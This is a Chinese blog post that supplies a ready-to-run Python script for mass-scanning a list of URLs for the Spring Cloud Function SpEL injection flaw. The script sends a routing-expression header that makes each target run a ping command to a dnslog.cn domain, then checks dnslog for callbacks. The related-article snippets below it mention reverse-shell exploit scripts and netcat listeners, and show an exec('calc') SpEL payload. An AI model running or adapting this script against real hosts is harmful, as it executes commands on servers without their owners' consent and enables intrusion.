Spring Cloud Function SpEL表达式注入漏洞批量检测脚本

已于 2022-03-30 12:36:15 修改
阅读量3.4k 收藏
点赞数
分类专栏: WEB安全 文章标签: apache 安全 linux
于 2022-03-30 11:32:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48170459/article/details/123842120
版权

仅可检测出网和ping命令可执行主机,可根据需求自行添加路由字典和加密payload

import requests
url="http://dnslog.cn/getdomain.php"
url1="http://dnslog.cn/getrecords.php"
file=input("请输入url文件保存路径:");#"C:\\Users\\ASUS\\Desktop\\ces1.txt";
with open(file,"r") as file1:
    for i in file1.readlines():
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"};
        header['Host']="dnslog.cn"
        header2 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"};
        request=requests.get(url,headers=header)
        if request.status_code != 200:
            print("dnslog连接失败,当前位置为"+i);
            exit(0);
        cookie=request.headers["Set-Cookie"]
        respone=request.content.decode("utf-8")
        he="T(java.lang.Runtime).getRuntime().exec(\"ping "+respone+"\")";
        header2["spring.cloud.function.routing-expression"] =he;
        data='aaa';
        url3=i.strip('\n');
        agreement=url3.split("://")[0];
        website=url3.split("://")[1].split("/")[0];
        url3=agreement+"://"+website+'/functionRouter';
        header2["Host"]=website;
        try:
            request1 = requests.post(url3, data=data,headers=header2,timeout=3);
        except:
            print(url3+"连接失败");
            continue;
        header["Cookie"]=cookie;
        request1=requests.get(url1,headers=header)
        if request1.status_code != 200:
            print("dnslog连接失败,当前位置为"+i);
            exit(0);
        if request1.content.decode("utf-8")!="[]":
            print(url3+"存在漏洞");

url文件样式
在这里插入图片描述
执行结果
在这里插入图片描述
靶机测试
在这里插入图片描述
在这里插入图片描述

weixin_48170459
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SqEl基础2
tomorrow_fine的博客
06-30 741
方法解析: public class MethodExprSample { public static void main(String[] args){ User user =new User(); ExpressionParser parser=new SpelExpressionParser(); EvaluationContex
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
0day-Spring Cloud Function SPEL漏洞预警
qq_18209847的博客
04-03 1744
近日,信息安全部监测到Spring Cloud官方修复了一个Spring Cloud Function中的SPEL表达式注入漏洞
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
我了解豹女就像农民伯伯了解大米
04-19 3119
启动vulhub docker环境: 访问:http://192.168.29.130:8080/ Kali攻击机创建url.txt文件加入url 检测漏洞: 利用工具POC进行探查是否存在SPEL漏洞 python Spel_RCE_POC.py url.txt 存在漏洞的url会显示到succ.txt中 反弹shell工具: Kali机开启1207端口监听: nc -lvp 1207 执行反弹shell poc python Spel_RCE_Bas.
位置穿越服务器,编写Spring Cloud Config Server路径穿越漏洞全面检测脚本
weixin_39798626的博客
08-10 548
Spring Cloud Config Server路径穿越漏洞(CVE-2019-3799)的分析文章已经很多了,这里我不在画蛇填足。在分析该漏洞之后,发现了一些小细节,感觉对该漏洞检测还是挺有帮助的。基于发现的这些细节,我们来构造适应各种场景,甚至各种奇葩场景的批量检测脚本!0x01 简洁原理Spring cloud config 分客户端和服务端。服务端供客户端查询配置,本次漏洞就是出在服务...
vulfocus复现:Spring Cloud Function SPEL 远程代码执行
woai_zhongguo的博客
07-18 1151
Vulfocus复现:Spring Cloud Function SPEL 远程代码执行
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
最新发布
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
Spring组件开发模式支持SPEL表达式
08-26
今天小编就为大家分享一篇关于Spring组件开发模式支持SPEL表达式,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
SPEL+编程语言参考手册
06-21
SPEL+编程语言参考手册中文版,很好的资源,很细致。
如何使用SpEL表达式实现动态分表查询
08-25
主要介绍了如何使用SpEL表达式实现动态分表查询,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Spring Cloud Function Spel表达式注入漏洞分析
si1ence的博客
04-14 3407
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。主要影响的版本包括 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
SpEL语法
学而不思则罔 思而不学则殆
06-24 871
SpEL语法
Java漏洞分析-Spring Cloud Function SPEL表达式注入漏洞分析
senior_artist的博客
04-19 1005
Spring Cloud 中的 Serveless框架存在Spel表达式注入,攻击者可通过该漏洞执行任意代码。
『Java安全SpEL注入
Ho1aAs‘s Blog
04-02 3032
文章目录SpEL简介示例后端代码常用表达式SpEL注入fuzz探测注入点命令执行RCE绕过方式1. String类动态生成字符串命令2. 反射+字符串拼接3. js引擎rce4. 反射+SpEL集合绕过参考引用完 SpEL简介 SpEL使用#{ }作为定界符,其中的内容都会被解析,${ }常用于引用属性名称 示例后端代码 首先绑一个Controller package com.example.javaspring; import org.springframework.expression.Expres
5、Spring SPEL使用之--在XML中使用SPEL
jaune162的专栏,最新动态请关注:https://jaune162.blog
05-22 6942
SPEL(Spring Expression Language)即Spring3中功能丰富强大的表达式语言,简称SpEL。SpEL是类似于OGNL和JSF EL的表达式语言,能够在运行时构建复杂表达式,存取对象属性、对象方法调用等。所有的SpEL都支持XML和Annotation两种方式,格式:#{ SpEL expression }。 可参考文章 CSDN博主 gudong2945 的《Spri
SPEL-Spring表达式
VincenLlin的专栏
06-14 627
Java EE有自己的EL表达式,Struts2有OGNL表达式,但两者
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值